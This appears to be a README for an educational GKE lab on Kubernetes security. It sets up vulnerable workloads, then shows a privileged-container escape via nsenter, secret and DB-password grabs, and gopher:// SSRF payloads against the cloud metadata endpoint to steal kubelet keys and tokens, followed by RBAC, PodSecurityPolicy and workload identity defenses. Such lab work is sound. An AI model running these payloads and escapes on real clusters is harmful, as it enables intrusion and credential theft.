- This repository is for a tutorial of "Kubernetes Security for Microservices"
- Caution
- This repository is for education.
PROJECT_ID="Your Project Name"
gcloud config set project $PROJECT_ID
gcloud services enable container.googleapis.com
gcloud beta container clusters create gke-security-testing --zone us-central1-a --machine-type n1-standard-1 --num-nodes 3 --enable-pod-security-policy --async
- You can check the status on console
gcloud container clusters get-credentials gke-security-testing --zone=us-central1-a
kubectl get node
kubectl apply -f manifest/ssrf_server/ -R
- Please don't expose deployment on the Internet through Service.
kubectl apply -f manifest/root/pod.yaml
kubectl exec -it root-container -- /bin/sh -c "nsenter --mount=/proc/1/ns/mnt -- /bin/bash"
kubectl --kubeconfig /var/lib/kubelet/kubeconfig get secret dummy-secret -o yaml
Get credentials(method 2) (Please copy this command from GitHub)
docker ps -q | xargs docker inspect --format='{{range .Config.Env}}{{println .}}{{end}}' | grep DB_Password
exit
- RBAC
- PodSecurityPolicy
alias kubectl-user='kubectl --as=system:serviceaccount:default:unprivileged-user'
kubectl delete pod root-container
kubectl delete rolebinding default-psp
kubectl apply -f manifest/psp/ -R
kubectl-user apply -f manifest/root/pod.yaml
kubectl-user get pod -n kube-system
kubectl port-forward deployment/ssrf-server 8080:8080 2>&1 >/dev/null &
https://www.example.com
gopher://169.254.169.254:80/_GET /computeMetadata/v1/instance/attributes/kube-env?alt=json HTTP/1.1%0d%0aMetadata-Flavor: Google%0d%0aConnection: Close%0d%0a%0d%0a
It contains "KUBELET_KEY".
cd metadata-script
curl -X POST 'http://localhost:8080/get_contents' --data 'url=gopher%3A%2F%2F169.254.169.254%3A80%2F_GET+%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fkube-env%3Falt%3Djson+HTTP%2F1.1%250d%250aMetadata-Flavor%3A+Google%250d%250aConnection%3A+Close%250d%250a%250d%250a' -o metadata.txt
mv ~/.kube/config ~/.kube/config.tmp
kubectl config get-contexts
- Extract necessary data from metadata
bash extract.sh
ls -l metadata
- Send CSR and Get node certificate
bash make_cert.sh $(cat metadata/nodename)
- Set env vars
KUBE_OPT="--client-certificate newcert/node.crt --client-key newcert/new.key --certificate-authority metadata/ca.crt --server https://$(cat metadata/api_ip)" && echo $KUBE_OPT
- Get secretName
kubectl $KUBE_OPT describe pod | grep secret
- Get secret
kubectl $KUBE_OPT get secret dummy-secret -o yaml
mv ~/.kube/config.tmp ~/.kube/config
kubectl config get-contexts
gopher://169.254.169.254:80/_GET /computeMetadata/v1/instance/service-accounts/default/token HTTP/1.1%0d%0aMetadata-Flavor: Google%0d%0aConnection: Close%0d%0a%0d%0a
- Enable workload identity (Need much time)
gcloud beta container clusters update gke-security-testing --identity-namespace=${PROJECT_ID}.svc.id.goog --region us-central1-a
gcloud beta container node-pools update default-pool --cluster=gke-security-testing --workload-metadata-from-node=GKE_METADATA_SERVER --zone us-central1-a
gcloud container clusters delete gke-security-testing --zone us-central1-a --async